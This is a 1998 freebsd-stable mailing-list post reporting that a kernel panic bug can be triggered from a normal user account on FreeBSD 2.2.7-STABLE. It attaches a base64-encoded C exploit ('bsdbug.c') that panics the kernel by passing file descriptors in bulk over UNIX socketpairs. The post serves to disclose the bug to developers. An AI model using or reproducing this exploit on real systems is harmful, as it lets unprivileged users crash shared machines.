From owner-freebsd-stable Tue Aug 11 00:32:54 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id AAA21423 for freebsd-stable-outgoing; Tue, 11 Aug 1998 00:32:54 -0700 (PDT) (envelope-from owner-freebsd-stable@FreeBSD.ORG) Received: from SchematiX.net (schematix.net [24.234.31.158]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id AAA21418 for ; Tue, 11 Aug 1998 00:32:52 -0700 (PDT) (envelope-from scott@SchematiX.net) Received: from localhost (scott@localhost) by SchematiX.net (8.8.8/8.8.8) with SMTP id AAA00268 for ; Tue, 11 Aug 1998 00:31:03 -0700 (PDT) (envelope-from scott@SchematiX.net) Date: Tue, 11 Aug 1998 00:31:03 -0700 (PDT) From: Scott To: FreeBSD-stable@FreeBSD.ORG Subject: Huge Bug in FreeBSD not fixed? Message-ID: MIME-Version: 1.0 Content-Type: MULTIPART/MIXED; BOUNDARY="0-1205284948-902820663=:216" Sender: owner-freebsd-stable@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.ORG This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. Send mail to mime@docserver.cac.washington.edu for more info. --0-1205284948-902820663=:216 Content-Type: TEXT/PLAIN; charset=US-ASCII I ran across this bug a while back on rootshell, and then again by a user on IRC who offered to take down my box. Soon after that, the bug was fixed and things were fine. But just out of boredom, i decided to run the exploit again. Sure enough, i had a kernel panic and that was it. All of this from a normal user account. The bug has reoccured recently and may cause problems on my server if the users find out about the vulnerability. I am running FreeBSD 2.2.7-STABLE (Last compiled on August 5th early in the morning). The system is running on a PII233 with 64MB RAM. This bug REALLY needs to be fixed ASAP. I would like to know if other systes are vulnerable as well. I discussed this matter on IRC and everyone said they had similar problems. This bug needs to be addressed soon. I would HATE switching to linux because my system keeps crashing. --------------- Scott Swindells, SchematiX.NET --0-1205284948-902820663=:216 Content-Type: TEXT/PLAIN; charset=US-ASCII; name="bsdbug.c" Content-Transfer-Encoding: BASE64 Content-ID: Content-Description: Content-Disposition: attachment; filename="bsdbug.c" LyogY3Jhc2hic2QuYw0KKioNCioqIFRISVMgUFJPR1JBTSBDQVVTRVMgS0VS TkVMIFBBTklDIE9OIFNPTUUgU1lTVEVNUw0KKioNCioqIFVzYWdlOiBjcmFz aG1lIFstLWhhcmRlcl0NCioqDQoqKiAtLWhhcmRlciBvcHRpb24gY2F1c2Vz IHRoaXMgcHJvZ3JhbSB0byBsZWF2ZSBvcGVuZWQgZmlsZSBkZXNjcmlwdG9y cyBoYW5naW5nDQoqKiB0aHVzIGluY3JlYXNpbmcgdGhlIHByb2JhYmlsaXR5 IG9mIHRoZSBjcmFzaC4NCioqDQoqLw0KDQojaW5jbHVkZSA8c3RkaW8uaD4N CiNpbmNsdWRlIDxmY250bC5oPg0KI2luY2x1ZGUgPHVuaXN0ZC5oPg0KI2lu Y2x1ZGUgPGVycm5vLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5j bHVkZSA8c3lzL3VuLmg+DQojaW5jbHVkZSA8c3lzL3Vpby5oPg0KI2luY2x1 ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KDQpp bnQgbWFpbihpbnQgYXJnYyxjaGFyICoqYXJndikgew0KaW50IGhhcmRlcj0w LHAsbnByb2MsaCxpLHNvY2tldGZkc1syXTsNCmNoYXIgYVsxMF07DQpzdHJ1 Y3QgaW92ZWMgaW92MT17YSwxfTsNCnN0cnVjdCBjbXNnaGRyICpjbTsNCnN0 cnVjdCBtc2doZHIgbXNnOw0KY2hhciBiYnVmZmVyW3NpemVvZihzdHJ1Y3Qg Y21zZ2hkcikrc2l6ZW9mKGludCkqMjRdOw0KDQppZihhcmdjPj0yJiYhc3Ry Y21wKGFyZ3ZbMV0sIi0taGFyZGVyIikpIGhhcmRlcj0xOw0KDQpucHJvYz0t MTsNCmZvcihpPTA7aTwxMDA7aSsrKXsNCiBpZighKHA9Zm9yaygpKSl7DQog IGlmKHNvY2tldHBhaXIoQUZfVU5JWCxTT0NLX1NUUkVBTSwwLHNvY2tldGZk cykpew0KICAgcGVycm9yKCJzb2NrZXRwYWlyIik7DQogICB9ZWxzZXsNCiAg IGNtPShzdHJ1Y3QgY21zZ2hkciopYmJ1ZmZlcjsNCiAgIGNtLT5jbXNnX2xl dmVsPVNPTF9TT0NLRVQ7DQogICBjbS0+Y21zZ190eXBlPVNDTV9SSUdIVFM7 DQogICBjbS0+Y21zZ19sZW49c2l6ZW9mKHN0cnVjdCBjbXNnaGRyKStzaXpl b2YoaW50KTsNCiAgIG1zZy5tc2dfbmFtZT0oY2FkZHJfdCkwOw0KICAgbXNn Lm1zZ19uYW1lbGVuPTA7DQogICBtc2cubXNnX2ZsYWdzPTA7DQogICBtc2cu bXNnX2lvdj0maW92MTsNCiAgIG1zZy5tc2dfaW92bGVuPTE7DQogICBtc2cu bXNnX2NvbnRyb2w9KGNhZGRyX3QpY207DQogICBtc2cubXNnX2NvbnRyb2xs ZW49Y20tPmNtc2dfbGVuOw0KICAgaWYoZm9yaygpKXsNCiAgICBjbG9zZShz b2NrZXRmZHNbMF0pOw0KICAgICooaW50KikoYmJ1ZmZlcitzaXplb2Yoc3Ry dWN0IGNtc2doZHIpKT1vcGVuKCIvZGV2L251bGwiLE9fUkRPTkxZKTsNCiAg ICBmb3IoaT0wO2k8MjA0ODtpKyspew0KICAgICBmcHJpbnRmKHN0ZGVyciwi JWQ+ICIsaSsxKTsNCiAgICAgd2hpbGUoc2VuZG1zZyhzb2NrZXRmZHNbMV0s Jm1zZywwKSE9MSl7DQogICAgICBpZihlcnJubyE9RUFHQUlOKXsNCiAgICAg ICBwZXJyb3IoIlxuc2VuZG1zZyIpOw0KICAgICAgIH0NCiAgICAgIH0NCiAg ICAgfQ0KICAgIH1lbHNlew0KICAgIGNsb3NlKHNvY2tldGZkc1sxXSk7DQog ICAgZm9yKGk9MDtpPDIwNDg7aSsrKXsNCiAgICAgKihpbnQqKShiYnVmZmVy K3NpemVvZihzdHJ1Y3QgY21zZ2hkcikpPS0xOw0KICAgICBmcHJpbnRmKHN0 ZGVyciwiPiVkICIsaSsxKTsNCiAgICAgY209KHN0cnVjdCBjbXNnaGRyKili YnVmZmVyOw0KICAgICBjbS0+Y21zZ19sZXZlbD1TT0xfU09DS0VUOw0KICAg ICBjbS0+Y21zZ190eXBlPVNDTV9SSUdIVFM7DQogICAgIGNtLT5jbXNnX2xl bj1zaXplb2Yoc3RydWN0IGNtc2doZHIpK3NpemVvZihpbnQpKjI0Ow0KICAg ICBtc2cubXNnX25hbWU9KGNhZGRyX3QpMDsNCiAgICAgbXNnLm1zZ19uYW1l bGVuPTA7DQogICAgIGlvdjEuaW92X2xlbj0xMDsNCiAgICAgbXNnLm1zZ19p b3Y9JmlvdjE7DQogICAgIG1zZy5tc2dfaW92bGVuPTE7DQogICAgIG1zZy5t c2dfY29udHJvbD0oY2FkZHJfdCljbTsNCiAgICAgbXNnLm1zZ19jb250cm9s bGVuPWNtLT5jbXNnX2xlbjsNCg0KICAgICBpZihyZWN2bXNnKHNvY2tldGZk c1swXSwmbXNnLDApIT0xKXsNCiAgICAgIHBlcnJvcigiXG5yZWN2bXNnIik7 DQogICAgICB9ZWxzZXsNCiAgICAgIGZwcmludGYoc3RkZXJyLCIoJWQpICIs KihpbnQqKShiYnVmZmVyK3NpemVvZihzdHJ1Y3QgY21zZ2hkcikpKTsNCiAg ICAgIGlmKCFoYXJkZXIpew0KICAgICAgIGNsb3NlKCooaW50KikoYmJ1ZmZl citzaXplb2Yoc3RydWN0IGNtc2doZHIpKSk7DQogICAgICAgfQ0KICAgICAg fQ0KICAgICB9DQogICAgZXhpdCgwKTsNCiAgICB9DQogICB3YWl0KCZoKTsN CiAgIH0NCiAgZXhpdCgwKTsNCiAgfWVsc2V7DQogIGlmKHA8MCl7DQogICBu cHJvYz1pOw0KICAgaT0xMDA7DQogICB9DQogIH0NCiB9DQppZihucHJvYzww KSBucHJvYz0xMDA7DQpmb3IoaT0wO2k8bnByb2M7aSsrKSB3YWl0KCZoKTsN CmZwcmludGYoc3RkZXJyLCJcbiVkIHByb2Nlc3NlcyBmaW5pc2hlZFxuIixu cHJvYyk7DQpyZXR1cm4gMDsNCn0NCg== --0-1205284948-902820663=:216-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-stable" in the body of the message